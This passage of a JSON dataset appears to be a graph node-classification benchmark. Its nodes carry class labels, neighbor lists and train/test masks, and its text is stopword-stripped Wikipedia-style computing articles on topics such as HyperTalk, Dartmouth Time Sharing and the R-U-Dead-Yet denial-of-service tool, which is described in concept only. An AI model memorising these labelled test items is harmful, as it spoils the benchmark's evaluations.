1980s tests official administration assumed national bureau standards nbs known today national institute standards technology nist accordance navy attrition regulations hopper retired naval reserve rank commander age 60 end 1966. ref name= urlattrition/retirement /ref recalled active duty august 1967 six-month period turned indefinite assignment retired 1971 asked return active duty 1972 promoted captain 1973 admiral elmo r. zumwalt jr. republican representative philip crane saw march 1983 segment 60 minutes championed joint resolution originating house representatives led promotion 15 december 1983 commodore special presidential appointment president ronald reagan remained active duty several years beyond mandatory retirement special approval congress effective november 8 1985 rank commodore renamed rear admiral lower half hopper became one navy female admirals following career spanned 42 years admiral hopper took retirement navy august 14 1986 celebration held boston commemorate retirement hopper awarded defense distinguished service medal highest non-combat decoration awarded department defense time retirement oldest active-duty commissioned officer united states navy 79 years eight months five days retirement ceremony aboard oldest commissioned ship united states navy 188 years nine months 23 days admirals william d. leahy chester w. nimitz hyman g. rickover charles stewart officers navy history serve active duty higher age leahy nimitz served active duty life due promotions rank fleet admiral following retirement navy hired senior consultant digital equipment corporation dec hopper initially offered job position rita yavinsky insisted applying position dec going typical formal interview process also sent letter yavinsky boss explaining would available alternating thursdays receiving high salary access unlimited expense account exhibited museum computing pioneer proposal hopper hired full-time senior consultant part position would report yavinsky position hopper represented company industry forums serving various industry committees along obligations retained position death age 85 1992 hopper goodwill ambassador primary activity capacity lectured widely early days computing career efforts computer vendors could take make life easier users visited digital engineering facilities generally received standing ovation conclusion remarks although longer serving officer always wore navy full dress uniform lectures allowed u.s. department defense regulation 32 cfr 53.2 2 important thing 've accomplished building compiler said training young people come know say 'do think say 'try back 'em need keep track get older stir 'em intervals n't forget take chances new year day 1992 hopper died sleep natural causes home arlington virginia 85 years age interred full military honors arlington national cemetery legacy inspiring factor creation grace hopper celebration women computing held yearly conference designed bring research career interests women computing forefront",
    "neighbors": [
      9345,
      9351,
      6664,
      4107,
      6675,
      3867,
      5277,
      7069,
      1952,
      9889,
      6313,
      10617,
      10670,
      8373,
      6454,
      1976,
      4412,
      11457,
      8262,
      1864,
      3529,
      11339,
      10061,
      6352,
      9298,
      1236,
      477,
      7775,
      10471,
      11242,
      2283,
      8301,
      2798,
      9710,
      9330,
      1783,
      8057,
      3323,
      3196,
      7421,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 4484,
    "label": 1,
    "text": "DOTO_Database:doto database doto database documentation oppressed online portal data hate-crime based religious identity happened india since 2014 website launched 7 march 2018 constitution club india new delhi inauguration ceremony attended ram punyani teesta setalvad saba naqvi zafar ul islam khan john dayal social activists documentation oppressed independent non-profit documentation center based new delhi run network civil society organizations national grassroot level like quill foundation human rights watch amnesty international chri people union civil liberties others doto database functions tracker violence site in-depth narratives database mixes crowd-sourcing model investigative editorial teams past years marked increase violence conducted certain sections society violence manifests different forms organized institutional violence state actions allied groups furtherance internalized biases primary objective doto database create common documentation platform civil society report hate crime incidents happening across india database document verifiable incidents targeted violence specific communities reported english urdu media well fact-finding civil society reports also provides platform in-depth narratives doto increase media reportage amalgamation crowd-sourcing model along investigative editorial teams easy-to-use model ultimately seeks make essential information accessible address number issues systemic violation fundamental rights erosion constitutional values deployment hate towards religious minorities india",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4485,
    "label": 8,
    "text": "Cherokee_(web_server):cherokee web server cherokee open-source cross-platform web server runs linux bsd variants solaris windows lightweight high-performance web server/reverse proxy licensed gnu general public license goal fast fully functional yet still light major features cherokee include graphical administration interface named cherokee-admin modular light-weight design independent tests shown cherokee better performing apache serving static dynamic content cherokee maintained developed open source community configuration wizards provided automatically configure web server perform specific tasks run frameworks applications provide support php fastcgi ruby rails coldfusion glassfish django alfresco gnu mailman .net mono rtorrent symfony zend engine plus generic video streaming uwsgi last years cherokee adopted numerous electronic device makes iot technology manufacturers examples include gopro action cameras drones xiaomi action cameras digi international internet things kits atn corporation high-end rifle scopes defender security cameras etc since cherokee open source software require manufacturers license code way know many companies embedding cherokee products",
    "neighbors": [
      1920,
      3462,
      7430,
      2060,
      9229,
      10125,
      7567,
      7695,
      1937,
      11154,
      7443,
      1556,
      10520,
      8350,
      10270,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      7983,
      10800,
      11439,
      2485,
      823,
      5048,
      5433,
      6714,
      9538,
      10622,
      8644,
      1991,
      4561,
      6993,
      595,
      1363,
      11134,
      4439,
      3545,
      2143,
      225,
      865,
      1250,
      2404,
      3553,
      4837,
      8554,
      6379,
      5612,
      9580,
      7022,
      2287,
      11376,
      8691,
      10611,
      3573,
      4725,
      11386,
      2045,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 4486,
    "label": 9,
    "text": "HyperTalk:hypertalk hypertalk high-level procedural programming language created 1987 dan winkler used conjunction apple computer hypercard hypermedia program bill atkinson main target audience hypertalk beginning programmers hypertalk programmers usually called authors process writing programs scripting hypertalk scripts resembled written english used logical structure similar pascal programming language hypertalk supported basic control structures procedural languages repeat for/while/until if/then/else well function message handler calls function handler subroutine message handler procedure data types usually need specified programmer conversion happened transparently background strings numbers classes data structures traditional sense place special string literals lists items delimited commas later versions itemdelimiter property allowed choosing arbitrary character late 1980s apple considered using hypercard hypertalk scripting language standard language across company within classic mac os operating system well interprocess communication apple non-apple products company oppose development imitations like supercard created hypertalk standards committee avoid incompatibility language variants case-insensitive language initially interpreted gained just-in-time compilation hypercard 2.0 basic operations including mathematical computations hypertalk favored natural-language ordering predicates ordering used mathematical notation example hypertalk codice_1 assignment command variable placed end statement whereas traditional basic programming language others would accomplished writing hypertalk code side-effect creating variable theresult fly scripts could assign type value variable using codice_1 command making hypertalk weakly typed conversions variable types invisible automatic string 3 could multiplied number 5 produce number 15 number 5 concatenated onto string 3 produce string 35 hypertalk would complain unless types could automatically converted flow control logic generally similar common languages using codice_3 structure conditionals supporting loops based flexible codice_4 syntax comments prefaced two minus signs codice_5 hypercard primary user interface concept card display system emulated index card cards normally used store information similar record conventional flat-file database graphical layout card created using mouse placing various elements card text fields buttons master layout card known background shown behind transparent areas card objects placed background fields buttons would shared common layout among several cards card-specific content collection cards backgrounds associated data stored stored single file known stack cards collectively data-containing objects referred containers hypertalk functions scripts normally stored within codice_6 property available many stack containers scripts could access properties container corresponding instance variables using codice_7 codice_8 instructions script property held plain text special properties scripts could placed run text container including string variables imported stacks using codice_9 command script could even user-provided text typed on-screen text field arbitrary text could executed using codice_10 command manner similar dynamic sql key concept hypertalk way referred containers navigational system based visual hierarchy stack every container stack given unique id number created could also given name scripts could refer objects using either identifiers along object type specified using codice_11 operator operator used natural language syntax making easily readable self-documenting code instance script stored button card might wish take user-supplied text gathered using text field store text variable called thevalue various contextual aspects statements could inferred interpreter statement example script would running context button specific card identifier card understood refer card user interacting addition value text submitted user assumed main property target operations otherwise specified likewise card field assumed target command opposed background field information could also omitted even container types short forms programmers could use save typing thus code equivalent shorter form objects within given context—the card background instance—were also given runtime number based z-order screen assist using position navigation hypertalk also included variety ordinal cardinal referencing systems simplify syntax assuming field typehere field card code could also written choice addressing style left programmer often different styles used different statements order make code readable hypertalk included codice_12 container acted fashion codice_13 qualifier found object-oriented languages allowing simple access current container object less common codice_14 variable held value last operation certain built-in operators example uses codice_15 command display dialog box capture text typed accompanying text field dialog completed hitting clicking value assigned codice_14 pseudo-variable code copies value card field using codice_1 assignment operator containers given type also available collections pluralized version container type name—the collection fields card codice_18 collections containers properties key among codice_19 property widely used iterations similar tasks instance one wanted hide fields card could accomplished code code exposes another common feature hypertalk property might several names operators case codice_20 command associated codice_21 act setting value container codice_22 property thus codice_23 exactly equivalent codice_24 similar example codice_25 command stopped visual updating short form codice_26 codice_27 property hypercard itself—also container many examples sort syntactic sugar found hypertalk order simplify syntax improve readability common code hypercard 2.2 later collection collections also available container codice_28 allowed script address objects container single iterator notable feature hypertalk container model handling text every collection text whether literal string program text typed text field considered container multiple collections containers within allowed scripts parse text using navigational commands container instance parsing space-delimited data file one might want extract third column like syntax allowed script walk text find particular data example process treating text container known chunking functions chunk expressions sorts expressions used handle file manipulation along set file management functions following code opens known file reads extracts data closes file hypertalk also included functions chunking strings using substring-find operation using codice_29 operator following code finds examples given pattern using codice_29 part codice_31 loop codice_32 finds location pattern within string hypertalk used chunking system produce structures like arrays lists structure would created placing multiple data items variable separated commas various types data could imported hypertalk script using strings would get parsed required instance position objects screen defined pair numbers representing x coordinates relative upper left corner following code creates variable called pos holds coordinate pair manipulates re-position buttons card diagonal top-left bottom-right codice_33 chunking expression originally based comma delimiter later versions hypercard changed value codice_34 offering ability parse arbitrary lists structures hypertalk used object-oriented concept calling scripts objects stack sending events would processed handlers declared interest receiving events using codice_35 syntax instance gui containers could send codice_36 event mouse button clicked released top container script could capture events like events first sent script object created event instance user clicked button codice_36 event first sent button button script object codice_36 handler script passed card background stack stacks whose scripts explicitly imported using codice_9 command home stack user-selected always-open hypercard stack finally hypercard application many simple events like mouse clicks buttons script would placed directly within object question button instance one might use example code within button handler fashion case code called multiple locations used global handler event script could determine original sender event using codice_40 function likewise scripts could send events containers using codice_41 command using navigational code refer container holding handlers code combining hypertalk string processing codice_10 command allowed construction interactive interpreters placing text field card placing code field script codice_43 global property returns name line number last field clicked form like line 10 card field 4 code first selects text clicked line extracts line number local variable uses codice_10 run text hypercard script codice_45 message sent button user clicked codice_36 sent user released mouse inside trigger action similarly hypercard sent periodic codice_47 message codice_48 codice_49 ... various messages related navigation different cards hypercard stack well user input codice_50 codice_51 ... system events far scripters concerned main event loops like procedural programming languages unlike general rapid application development platforms hypercard stacks always looked like stacks menu bar hypercard programmer default—scripting could add delete modify menus single window fixed size early versions certain cases commands central operation part application directly available hypertalk good example creation new cards part application directly accessible hypertalk language new card could created using new card menu item could simulated code usingcodice_52 hypertalk called menu commands menu commands also invoked handlers hypertalk run custom code copy menu item selected one would place script stack using codice_53 handler examine codice_54 see copy hypertalk also provided script control built-in drawing tools simply scripting needed changes paint tools simulating mouse movements using codice_55 codice_56 commands although hypertalk language languished like hypercard received second lease life plugin protocol so-called external commands xcmds external functions xfcns native code containers attached stacks macintosh-specific resources single entry point return value xcmds xfcns could called like regular message function handlers hypertalk scripts also able send messages back hypercard application enterprising xcmd authors added advanced features like full color support colorizehc hypertint addcolor multiple special-purpose windows prompt tabloid textoid listoid showdialog megawindows drag drop support various hardware interfaces language various scripting languages taken cues hypertalk commonly regrouped loosely defined family named xtalk well second-level clones like many method names first popularized hypertalk made later languages codice_57 event handler javascript although asymetrix toolbook often also considered hypercard clone scripting language apparently bears little resemblance hypertalk clones dialects commonly referred moniker xtalk-languages added various features language expected modern programming language like exception handling user-defined object properties timers multi-threading even user-defined objects",
    "neighbors": [
      9345,
      3462,
      6791,
      2571,
      8973,
      655,
      5395,
      8854,
      544,
      8225,
      8609,
      6958,
      10030,
      9780,
      1973,
      576,
      10435,
      6085,
      8262,
      8524,
      2768,
      11219,
      11228,
      9185,
      2658,
      4844,
      1389,
      10097,
      9209,
      2556,
      4989
    ],
    "mask": "Test"
  },
  {
    "node_id": 4487,
    "label": 4,
    "text": "M86_Security:m86 security m86 security privately owned internet threat protection company specialized web email security products content filtering appliances company international headquarters located basingstoke development centers located california israel new zealand founded 1995 company changed name 8e6 technologies 2000 co-founder ceo ten years george shih developed many technologies used 8e6 internet filtering products originally effort provide “ pornography-free internet use children ” company offered filtering software computers used education environments later 8e6 technologies developed products manage internet access markets company internet filtering reporting monitoring appliances named “ best buy ” sc magazine 2007 2008 november 2008 8e6 technologies marshal limited provider email web security products merged became marshal8e6 george shih remained interim ceo former finjan ceo john vigouroux named position april 2009 november 2008 8e6 technologies company sold web filtering products marshal software provider integrated email web security products merged form marshal8e6 march 2009 marshal8e6 acquired avinti along behavior-based malware technology detecting blended threats occur email upon completion merger avinti ceo william kilmer joined marshal8e6 chief marketing officer part rebranding campaign marshal8e6 changed name m86 security september 2009 following november m86 security acquired finjan software along secure web gateway formerly finjan vital security product licenses patents real-time code analysis technology giving company malware detection prevention capabilities web gateway company previously announced john vigouroux ceo finjan software new ceo m86 security marshal trace labs finjan malicious code research center combined form m86 security labs researches reports web email-based security threats august 2010 m86 ranked number 1,230 inc. 5000 annual listing fastest private growing companies america march 6 2012 announced chicago based trustwave holdings would acquire m86 security march 19 2012 trustwave completed acquisition m86 security subsequently rebranded products operations trustwave name",
    "neighbors": [
      612,
      3941,
      6707,
      2325,
      4725,
      4471,
      10745,
      7515,
      9215
    ],
    "mask": "Test"
  },
  {
    "node_id": 4488,
    "label": 4,
    "text": "R-U-Dead-Yet:r-u-dead-yet r.u.d.y. short r u dead yet acronym used describe denial service dos tool used hackers perform slow-rate a.k.a “ low slow ” attacks directing long form fields targeted server known interactive console thus making user-friendly tool opens fewer connections website targeted long period keeps sessions open long feasible amount open sessions overtires server website making unavailable authentic visitors data sent small packs incredibly slow rate normally gap ten seconds byte intervals definite may vary avert detection victim servers types attacks may face issues able access particular website disrupt connection drastically slow network performance etc hackers use attacks different purposes targeting different servers hosts purposes include limited blackmail vengeance sometimes even activism rudy attack opens concurrent post http connections http server delays sending body post request point server resources saturated attack sends numerous small packets slow rate keep connection open server busy low-and slow attack behavior makes relatively difficult detect compared flooding dos attacks raise traffic volume abnormally",
    "neighbors": [
      225,
      2754,
      9282,
      2409,
      6347,
      2060,
      6735,
      11351,
      953
    ],
    "mask": "Test"
  },
  {
    "node_id": 4489,
    "label": 4,
    "text": "Resilient_control_systems:resilient control systems modern society computerized digital control systems used reliably automate many industrial operations take granted power plant automobiles drive however complexity systems designers integrate roles responsibilities humans interact systems cyber security highly networked systems led new paradigm research philosophy next generation control systems resilient control systems consider elements disciplines contribute effective design cognitive psychology computer science control engineering develop interdisciplinary solutions solutions consider things tailor control system operating displays best enable user make accurate reproducible response design cyber security protections system defends attack changing behaviors better integrate widely distributed computer control systems prevent cascading failures result disruptions critical industrial operations context cyber-physical systems resilient control systems aspect focuses unique interdependencies control system compared information technology computer systems networks due importance operating critical industrial operations originally intended provide efficient mechanism controlling industrial operations development digital control systems allowed flexibility integrating distributed sensors operating logic maintaining centralized interface human monitoring interaction ease readily adding sensors logic software done relays isolated analog instruments led wide acceptance integration systems industries however digital control systems often integrated phases cover different aspects industrial operation connected network leading complex interconnected interdependent system control theory applied often nothing digital version analog counterparts dependence digital control systems upon communications networks precipitated need cybersecurity due potential effects confidentiality integrity availability information achieve resilience next generation control systems therefore addressing complex control system interdependencies including human systems interaction cyber security recognized challenge research resilience engineering last decade focused two areas organizational information technology organizational resilience considers ability organization adapt survive face threats including prevention mitigation unsafe hazardous compromising conditions threaten existence information technology resilience considered number standpoints networking resilience considered quality service computing considered issues dependability performance face unanticipated changes however based upon application control dynamics industrial processes functionality determinism primary considerations captured traditional objectives information technology considering paradigm control systems one definition suggested resilient control systems tolerate fluctuations via structure design parameters control structure control parameters however definition taken perspective control theory application control system consideration malicious actor cyber security directly considered might suggest definition effective reconstitution control attack intelligent adversaries proposed however definition focuses resilience response malicious actor consider cyber-physical aspects control system definition resilience considers benign malicious human interaction addition complex interdependencies control system application use term “ recovery ” used context resilience paralleling response rubber ball stay intact force exerted recover original dimensions force removed considering rubber ball terms system resilience could defined ability maintain desired level performance normalcy without irrecoverable consequences resilience context based upon yield strength ball control systems require interaction environment namely sensors valves pumps make industrial operation reactive environment control systems require awareness state make corrective changes industrial process maintain normalcy mind consideration discussed cyber-physical aspects human systems integration cyber security well definitions resilience broader critical infrastructure level following deduced definition resilient control system considering flow digital control system basis resilient control system framework designed referring left side fig 1 resilient control system holistically considers measures performance normalcy state space center understanding performance priority provide basis appropriate response combination human automation embedded within multi-agent semi-autonomous framework finally right information must tailored consumer address need position desirable response several examples scenarios resilience differs provides benefit control system design available literature primary tenets resilience contrasted traditional reliability presented considering integrated approach resilient control systems cyber-physical tenants complement fundamental concept dependable reliable computing characterizing resilience regard control system concerns including design considerations provide level understanding assurance safe secure operation industrial facility tenants discussed individually summarize challenges address order achieve resilience benign human ability quickly understand novel solutions provide ability adapt unexpected conditions behavior provide additional resilience control system reproducibly predicting human behavior continuing challenge ability capture historic human preferences applied bayesian inference bayesian belief networks ideally solution would consider direct understanding human state using sensors eeg considering control system design interaction goal would tailor amount automation necessary achieve level optimal resilience mixed initiative response presented human would actionable information provides basis targeted reproducible response contrast challenges prediction integration benign human control systems abilities malicious actor hacker undermine desired control system behavior also create significant challenge control system resilience application dynamic probabilistic risk analysis used human reliability provide basis benign actor however decidedly malicious intentions adversarial individual organization nation make modeling human variable objectives motives however defining control system response intentions malicious actor looks forward level recognized behavior gain advantage provide pathway undermining system whether performed separately preparation cyber attack system behaviors provide opportunity successful attack without detection therefore considering resilient control system architecture atypical designs imbed active passively implemented randomization attributes would suggested reduce advantage much current critical infrastructure controlled web interconnected control systems either architecture termed distributed control systems dcs supervisory control data acquisition scada application control moving toward decentralized state moving smart grid complex interconnected nature individual homes commercial facilities diverse power generation storage creates opportunity challenge ensuring resulting system resilient threats ability operate systems achieve global optimum multiple considerations overall efficiency stability security require mechanisms holistically design complex networked control systems multi-agent methods suggest mechanism tie global objective distributed assets allowing management coordination assets optimal benefit semi-autonomous constrained controllers react rapidly maintain resilience rapidly changing conditions establishing metric capture resilience attributes complex least considered based upon differences interactions interdependencies evaluating control cyber cognitive disturbances especially considered disciplinary standpoint leads measures already established however metric instead based upon normalizing dynamic attribute performance characteristic impacted degradation alternative suggested specifically applications base metrics resilience characteristics given follows type disturbance performance characteristics exist time data integrity time terms delay mission communications latency data terms corruption modification normalizing factors general idea base metric “ expected ” necessarily actual initiator degradation considering time metrics basis resilient un-resilient systems observed fig 2 dependent upon abscissa metrics chosen fig 2 reflects generalization resiliency system several common terms represented graphic including robustness agility adaptive capacity adaptive insufficiency resiliency brittleness overview definitions terms following explanations provided abscissa fig 2 recognized cyber cognitive influences affect data time underscores relative importance recognizing forms degradation resilient control designs cybersecurity single cyberattack degrade control system multiple ways additionally control impacts characterized indicated terms fundamental seem little value correlating impact terms like cost development use cases provide means relevance codified example given impact system dynamics data performance control loop directly ascertained show approach instability operational impact nature control systems implies starting point development resilience metrics control physical process based upon quantifiable performance measures including first principles stochastic ability provide measurement basis correlating operational performance adaptation also becomes starting point correlation data time variations come cognitive cyber-physical sources effective understanding based upon developing manifold adaptive capacity correlates design operational buffer power system manifold based upon real reactive power assets controllable latitude maneuver impact disturbances time modern distribution system mds assets aggregated individual contributions shown fig 3 figure assets include battery b alternate tie line source c asymmetric p/q-conjectured source distribution static synchronous compensator dstatcom e low latency four quadrant source energy limit 1 considering current digital control system designs cyber security systems dependent upon considered border protections i.e. firewalls passwords etc malicious actor compromised digital control system industrial operation man-in-the-middle attack data corrupted control system industrial facility operator would way knowing data compromised someone security engineer recognized attack occurring operators trained provide prompt appropriate response stabilize industrial facility likelihood corrupt data would lead operator reacting situation lead plant upset resilient control system per fig 1 cyber physical data fused recognize anomalous situations warn operator 2 society becomes automated variety drivers including energy efficiency need implement ever effective control algorithms naturally follow however advanced control algorithms dependent upon data multiple sensors predict behaviors industrial operation make corrective responses type system become brittle insofar unrecognized degradation sensor lead incorrect responses control algorithm potentially worsened condition relative desired operation industrial facility therefore implementation advanced control algorithms resilient control system also requires implementation diagnostic prognostic architectures recognize sensor degradation well failures industrial process equipment associated control algorithms world advancing automation dependence upon advancing technologies skill sets needed keep united states forefront innovation challenges may appear rooted design better means better control infrastructures greater safety efficiency generation use energy however evolution technologies developed achieve current design automation achieved complex environment cyber-attack human error design operation damaging storm wreak havoc infrastructure depend nation next generation systems need consider broader picture ensure path forward failures lead ever greater catastrophic events critical resource students tomorrow expected advance designs require perspective challenges contributions others fulfill need addressing need courses developed provide perspectives relevant examples overview issues provide opportunity create resilient solutions universities george mason university northeastern tie critical infrastructure operations important aspect courses development technologies designed set stage next generation automation become evident effective teams comprised several disciplines however developing level effectiveness time consuming done professional environment expend lot energy time provides little obvious benefit desired outcome clear earlier stem disciplines successfully integrated effective recognizing ’ contributions working together achieve common set goals professional world team competition venues resilience week natural outcome developing environment allowing interdisciplinary participation providing exciting challenge motivate students pursue stem education standards policy define resilience nomenclature metrics needed establish value proposition investment includes government academia industry ieee industrial electronics society taken lead forming technical committee toward end purpose committee establish metrics standards associated codifying promising technologies promote resilience automation effort distinct supply chain community focus resilience security efforts iso nist",
    "neighbors": [
      5002,
      4081,
      4863,
      9688,
      5373,
      8095
    ],
    "mask": "None"
  },
  {
    "node_id": 4490,
    "label": 7,
    "text": "Client_(computing):client computing client computer program part operation relies sending request another program computer hardware software accesses service made available server may may located another computer example web browsers clients connect web servers retrieve web pages display email clients retrieve email mail servers online chat uses variety clients vary depending chat protocol used multiplayer video games online video games may run client computer term client may also applied computers devices run client software users use client software client part client–server model still used today clients servers may computer programs run machine connect via inter-process communication techniques combined internet sockets programs may connect service operating possibly remote system internet protocol suite servers wait potential clients initiate connections may accept term first applied devices capable running stand-alone programs could interact remote computers via network computer terminals clients time-sharing mainframe computer one classification client computers devices either thick clients thin clients hybrid clients thick client also known rich client fat client client performs bulk data processing operations necessarily rely server personal computer common example fat client relatively large set features capabilities light reliance upon server example computer running art program krita sketchup ultimately shares result work network thick client computer runs almost entirely standalone machine save send receive files via network standard called workstation thin client minimal sort client thin clients use resources host computer thin client generally presents processed data provided application server performs bulk required data processing device using web application office web apps thin client hybrid client mixture two client models similar fat client processes locally relies server storing persistent data approach offers features fat client multimedia support high performance thin client high manageability flexibility device running online version video game diablo iii example hybrid client",
    "neighbors": [
      5125,
      4623,
      10258,
      531,
      5652,
      7188,
      3094,
      5146,
      8731,
      2076,
      2080,
      545,
      7204,
      4135,
      8747,
      5677,
      559,
      8760,
      10816,
      5188,
      71,
      5199,
      7761,
      1107,
      5205,
      3670,
      6231,
      6746,
      3676,
      6237,
      8797,
      10341,
      3692,
      9332,
      4725,
      5749,
      119,
      2169,
      1664,
      5251,
      4229,
      2695,
      6794,
      8331,
      9867,
      6797,
      11418,
      5791,
      3744,
      10925,
      2222,
      2228,
      9908,
      9909,
      1719,
      3770,
      708,
      4294,
      6351,
      3792,
      4310,
      9946,
      2267,
      225,
      3813,
      7398,
      744,
      5353,
      234,
      4331,
      8425,
      2797,
      3822,
      9451,
      7921,
      6904,
      7928,
      11000,
      2299,
      5371,
      3328,
      8979,
      1812,
      5397,
      3350,
      6933,
      11029,
      10522,
      5405,
      3366,
      1834,
      7984,
      10032,
      10033,
      8504,
      6970,
      3899,
      11581,
      7488,
      11073,
      11075,
      2373,
      8006,
      328,
      10057,
      6991,
      2387,
      853,
      7515,
      10588,
      3935,
      5474,
      3939,
      3428,
      11112,
      2409,
      362,
      8557,
      8051,
      1908,
      6520,
      3964,
      2940,
      2430,
      2432,
      3971,
      8584,
      8586,
      6541,
      10126,
      5531,
      1962,
      5034,
      4013,
      11693,
      945,
      10677,
      8630,
      7095,
      7100,
      11197,
      8640,
      4546,
      8644,
      7626,
      10186,
      8654,
      6098,
      10196,
      469,
      5078,
      2520,
      3032,
      5085,
      10722,
      5605,
      3558,
      10727,
      8169,
      11244,
      4589,
      4085,
      5114
    ],
    "mask": "Train"
  },
  {
    "node_id": 4491,
    "label": 3,
    "text": "Advanced_Synchronization_Facility:advanced synchronization facility advanced synchronization facility asf proposed extension x86-64 instruction set architecture adds hardware transactional memory support introduced amd latest specification dated march 2009. still proposal stage released microprocessors implement extension asf provides capability start end abort transactional execution mark cache lines protected memory access transactional code regions contains four new instructions—codice_1 codice_2 codice_3 codice_4—and turns otherwise invalid codice_5-prefixed codice_6 codice_7 codice_8 instructions valid ones inside transactional code regions 256 levels nested transactional code regions supported codice_1 codice_2 instructions mark start end transactional code region inside transactional code regions codice_5-prefixed codice_12 codice_7 codice_8 instructions mark four cache lines protected memory access accesses processor cores protected cache lines result exceptions turn cause transaction aborts stores protected cache lines must performed using codice_15 instructions marked cache lines released protection codice_4 instruction transaction aborts generated hardware explicitly requested codice_3 instruction rolls back modifications protected cache lines restarts execution instruction following top-level codice_1 instruction",
    "neighbors": [
      2821,
      6924,
      4237,
      7313,
      6038,
      9369,
      9500,
      2088,
      9391,
      8120,
      8506,
      2237,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      5326,
      977,
      2514,
      3537,
      2516,
      5844,
      9428,
      7387,
      4444,
      8795,
      3294,
      2655,
      1122,
      7783,
      10985,
      5356,
      9964,
      5358,
      9582,
      8944,
      10734,
      499,
      1399,
      9976,
      4603,
      10620
    ],
    "mask": "Train"
  },
  {
    "node_id": 4492,
    "label": 2,
    "text": "Dartmouth_Time_Sharing_System:dartmouth time sharing system dartmouth time-sharing system dtss operating system first developed dartmouth college 1963 1964 first successful large-scale time-sharing system implemented also system basic language developed dtss developed continually next decade reimplemented several generations computers finally shut 1999 professors john kemeny thomas kurtz dartmouth college purchased royal mcbee lgp-30 computer around 1959 programmed undergraduates assembly language kurtz four students programmed dartmouth algol 30 compiler implementation algol 58 programming language two students evolved scalp self contained algol processor language 1962-1964 kemeny freshman sidney marshall collaborated create dartmouth oversimplified programming experiment dope used large freshman courses kurtz approached kemeny either 1961 1962 following proposal dartmouth students would access computing free open-access could accomplished via creating time-sharing system kurtz learned colleague john mccarthy mit suggested n't guys timesharing although stated dtss inspired pdp-1-based time-sharing system bolt beranek newman evidence true 1962 kemeny kurtz submitted proposal development new time-sharing system nsf ultimately funded 1964 sufficient assurance dartmouth nsf would support system signed contract ge began preliminary work 1963 proposal funded particular evaluated candidate computers bendix ge ibm settled upon ge-225 system paired datanet-30 communications processor two-processor approach unorthodox kemeny later recalled time many experts ge elsewhere tried convince us route two-computer solution wasteful inefficient essence datanet-30 provided user-interface scheduler user programs ran ge-225 implementation began 1963 student team direction kemeny kurtz aim providing easy access computing facilities members college ge-225 datanet-30 computers arrived february 1964 became operational mid march may 1 1964 4:00 a.m. system began operations autumn 1964 hundreds freshman students began use system via 20 teletypes access hanover high school via one additional teletype later autumn ge-225 computer replaced faster ge-235 computer minimal issues summer 1965 system could support forty simultaneous users dartmouth document october 1964 later revised ge describes overall dtss architecture dtss design emphasized immediate feedback kemeny kurtz observed response time averages 10 seconds destroys illusion one computer consequence many dtss users believed terminal computer educational aims ease use priority dtss design dtss implemented world first integrated design environment ide line typed user beginning line number added program replacing previously stored line number anything else taken command immediately executed lines consisted solely line number n't stored remove previously stored line number method editing provided simple easy use service allowed large numbers teleprinters terminal units dartmouth timesharing system ide commands included commands often believed part basic language users fact part time sharing system also used preparing algol fortran programs via dtss terminals kemeny kurtz originally hoped ge would enter research partnership end kurtz student anthony knapp authored document proposed system design presented ge phoenix office 1962 however ge rejected partnership october 1962 proposal dartmouth framed solely commercial sale said ge dartmouth promoted operational dartmouth time sharing system october 1964 fall joint computer conference san francisco three teletypes connected dartmouth system hanover.. december 1964 january 1965 two dartmouth students installed working copies dtss basic ge computers phoenix early 1965 ge began advertise timesharing services ge-265 system ge 235 datanet 30 including basic dartmouth algol later renaming ge mark time-sharing system next years ge opened 25 computer centers united states elsewhere serving fifty thousand users computer history museum corporate histories collection describes ge mark history way 1966-1968 dtss reimplemented ge 635 still using datanet-30 terminal control ge 635 system delivered november 1966 october 1967 providing service based phase software jointly developed dartmouth ge ge subsequently marketed ge mark ii system parallel work dartmouth embarked 1967 development phase ii direction professor john kemeny programming carried students faculty phase ii dartmouth time-sharing system replaced phase 1st april 1969 dartmouth described 1969 new dtss architecture influenced three criteria new version completely different internally earlier dtss provided near-identical user interface enable smooth transition users course materials 635 version provided interactive time-sharing nearly 300 simultaneous users 1970s large number time operated eleven commercial academic sites u.s.a. canada europe evolved 1970s later versions moved honeywell 6000 series mainframes 1973 honeywell 716 communication processors 1974 1976 ge-635 system replaced honeywell 66/40a computer remained operation end 1999 dtss version 2 included novel form inter-process communication called communication files significantly antedated unix pipes design documents put conceptual origin sometime 1967 described briefly 1969 conference communication files supported read write close operations also synchronous asynchronous data transfer random access status inquiries out-of-band signaling error reporting access control precise semantics operation determined master process douglas mcilroy notes communication files akin plan 9 9p protocol familiar io notable application communication files support multi-user conferences behaved somewhat like conference phone calls implemented entirely user-space application programs mentioned hanover high school connected dtss system beginning next decade many high schools colleges connected dtss via kiewit network named peter kiewit donor funds kiewit computation center housed dtss computers staff schools connected dtss via one teletypes modems dial-up telephone lines time dartmouth ran active programs engage train high school teachers using computation within courses 1967 following high schools joined kiewit network hanover high school holderness school mascoma valley regional high school kimball union academy mount hermon school phillips andover academy phillips exeter academy st. paul school vermont academy.. group expanded dartmouth secondary school project funded nsf 1967-1968 added following new england high schools cape elizabeth high school concord high school hartford high school vermont keene high school lebanon high school loomis school manchester central high school rutland high school st. johnsbury academy south portland high school timberlane high school 1968-1970 dartmouth added number colleges kiewit network via regional college consortium included bates college berkshire community college bowdoin college colby junior college middlebury college mount holyoke college new england college norwich university university vermont vermont technical college 1971 kiewit network connected 30 high schools 20 colleges new england new york new jersey time dtss supporting 30,000 users 3,000 dartmouth college 1973 kiewit network expanded include schools illinois michigan upstate new york ohio montreal canada kemeny kurtz intended students technical nontechnical fields use dtss arranged second trimester freshman mathematics class include requirement writing debugging four dartmouth basic programs 1968 80 dartmouth students experience computer programming 80 classes included official computer use including engineering classics geography sociology spanish 57 dtss use courses 16 research 27 casual use entertainment university stated sense regarded frivolous kemeny kurtz believed activities encouraged users become familiar fear computer pleased find 40 faculty members—not technical fields—used dtss many students continued using system longer required kemeny wrote brochure describing system student could enter library borrow book without asking permission explaining purpose student may walk kiewit computation center sit console use time-sharing system one ask solving serious research problem homework easy way playing game football writing letter girlfriend 1967–68 school year dtss library 500 programs including kemeny kurtz reported many games addition 2,600 dartmouth users 5,550 people ten universities 23 high schools accessed dtss early 1970s campus 150 terminals 25 buildings including portable units patients campus infirmary 2,000 users logged dtss day 80 students 70 faculty used system year off-campus dartmouth educational time-sharing network included users 79 terminals 30 high schools 20 universities including middlebury college phillips 